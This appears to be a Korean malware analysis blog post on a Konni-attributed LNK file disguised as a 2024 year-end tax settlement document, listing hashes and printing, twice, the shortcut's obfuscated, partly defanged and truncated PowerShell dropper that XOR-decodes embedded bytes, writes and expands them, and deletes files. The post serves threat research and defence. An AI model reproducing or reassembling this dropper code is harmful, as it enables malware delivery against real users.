북한 해킹 단체 코니(Konni) 에서 만든 악성코드-2024년 귀속 연말정산 안내문_세한.docx(2025.2.28)
Contents
오늘은 북한 해킹 단체 코니(Konni) 에서 만든 악성코드인 2024년 귀속 연말정산 안내문_세한.docx(2025.2.28)에 대해 글을 적어보겠습니다.
파일명:2024년 귀속 연말정산 안내문_세한.docx.lnk
사이즈:2 MB
MD5:a2785ec65622217be80174b887b1eb06
SHA-1:5820e221437e87d6663adaddedb05bb5566be3da
SHA-256:b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
이며 악성코드에 포함된 파워셀 코드는 다음과 같습니다.
StringData
{
namestring: docx File
relativepath: not present
workingdir: not present
commandlinearguments:
c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell(.)exe') do (if exist "%f" (%f "function wickedness{param($distant); <#h
indrance epoch#>$wicked = $distant(.)substring(0,$distant.length-4) + ''; <#reproach stor
y#>return $wicked;};function pregnant{param($hearing);<#goose margin#> re''m'(')ove''-''i
t''e''m <#naval rush#> -path $hearing <#wear deluge#> -force;};function friend{param($tho
usand,$harangue,$deformed,$greatnes(s),$measuring);<#stealing ingredient#> $suggestion=N'
'e''w-O''b''je''c''t System.IO.FileStream(<#cushion desolate#>$thousand,<#mostly incline#
>[Sys(t)em.IO.FileMode]::Open,<#valid guard#>[System.IO.FileAccess]::Read);<#desirous cri
sp#> $suggestion(.)Seek(<#page impression#>$harangue,[System.IO.SeekOrigin]::Begin);<#sus
pect spirituous#> $mass=$deformed*0x01;<#pliant entertain#> $lowering=New''-''(O)''b''jec
''t byte[] <#equa(t)or preacher#>$deformed; <#alkaline check#> $strike=Ne''w''-O''b''(j)e
''c''t byte[] <#rig(h)teous crossing#>$mass; <#whol(l)y invasion#>$suggestion.Read(<#inve
ntion dart#>$strike,0,<#apartment bearing#>$mass); $suggestion.Close();$minister=0(;)w(h)
ile($minister -lt $deformed){<#unstable treatment#>$lowering[$minister]=$strike[$minister
*0x01] -bxor $greatness;$minister+(+);}<#academy t(r)(u)ck#> set''-''co''n''t''en''t $mea
suring <#fault harbor#> $lowering -Enco(d)ing <#margin science#> Byte;};function weaving{
param($sweeten, $chosen);<#modify prevailing#> expand $sweeten <#woody hostile#> -F:* $ch
osen;};fu(n)ction familiar{$chain = $env:public<#telltale impartial#> + '\' +<#earthy vene
real#> 'do'+'cume'+'nts';<#fossil collec(t)or#> return $chain;};function ferment{param($d
rink); <#expansion refusal#>$ruling = Sp''l''it-''Pat''h $drink;<#disposal vent#> return
$rul(i)ng;};function pursue{return G''e''t-L''oca''tio''n;};function tangent{<#rough grea
se#>return $env:Temp;};function repetition{$preach(i)ng = pursue; $treatise …
파일명:2024년 귀속 연말정산 안내문_세한.docx.lnk
사이즈:2 MB
MD5:a2785ec65622217be80174b887b1eb06
SHA-1:5820e221437e87d6663adaddedb05bb5566be3da
SHA-256:b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
이며 악성코드에 포함된 파워셀 코드는 다음과 같습니다.
StringData
{
namestring: docx File
relativepath: not present
workingdir: not present
commandlinearguments:
c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell(.)exe') do (if exist "%f" (%f "function wickedness{param($distant); <#h
indrance epoch#>$wicked = $distant(.)substring(0,$distant.length-4) + ''; <#reproach stor
y#>return $wicked;};function pregnant{param($hearing);<#goose margin#> re''m'(')ove''-''i
t''e''m <#naval rush#> -path $hearing <#wear deluge#> -force;};function friend{param($tho
usand,$harangue,$deformed,$greatnes(s),$measuring);<#stealing ingredient#> $suggestion=N'
'e''w-O''b''je''c''t System.IO.FileStream(<#cushion desolate#>$thousand,<#mostly incline#
>[Sys(t)em.IO.FileMode]::Open,<#valid guard#>[System.IO.FileAccess]::Read);<#desirous cri
sp#> $suggestion(.)Seek(<#page impression#>$harangue,[System.IO.SeekOrigin]::Begin);<#sus
pect spirituous#> $mass=$deformed*0x01;<#pliant entertain#> $lowering=New''-''(O)''b''jec
''t byte[] <#equa(t)or preacher#>$deformed; <#alkaline check#> $strike=Ne''w''-O''b''(j)e
''c''t byte[] <#rig(h)teous crossing#>$mass; <#whol(l)y invasion#>$suggestion.Read(<#inve
ntion dart#>$strike,0,<#apartment bearing#>$mass); $suggestion.Close();$minister=0(;)w(h)
ile($minister -lt $deformed){<#unstable treatment#>$lowering[$minister]=$strike[$minister
*0x01] -bxor $greatness;$minister+(+);}<#academy t(r)(u)ck#> set''-''co''n''t''en''t $mea
suring <#fault harbor#> $lowering -Enco(d)ing <#margin science#> Byte;};function weaving{
param($sweeten, $chosen);<#modify prevailing#> expand $sweeten <#woody hostile#> -F:* $ch
osen;};fu(n)ction familiar{$chain = $env:public<#telltale impartial#> + '\' +<#earthy vene
real#> 'do'+'cume'+'nts';<#fossil collec(t)or#> return $chain;};function ferment{param($d
rink); <#expansion refusal#>$ruling = Sp''l''it-''Pat''h $drink;<#disposal vent#> return
$rul(i)ng;};function pursue{return G''e''t-L''oca''tio''n;};function tangent{<#rough grea
se#>return $env:Temp;};function repetition{$preach(i)ng = pursue; $treatise …
IoC
a2785ec65622217be80174b887b1eb06
b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
5820e221437e87d6663adaddedb05bb5566be3da
b81513f0f8d3db382bb8f931bf2b7a0d4f26f74cfcf60b5d889de87ef2f1d543
5820e221437e87d6663adaddedb05bb5566be3da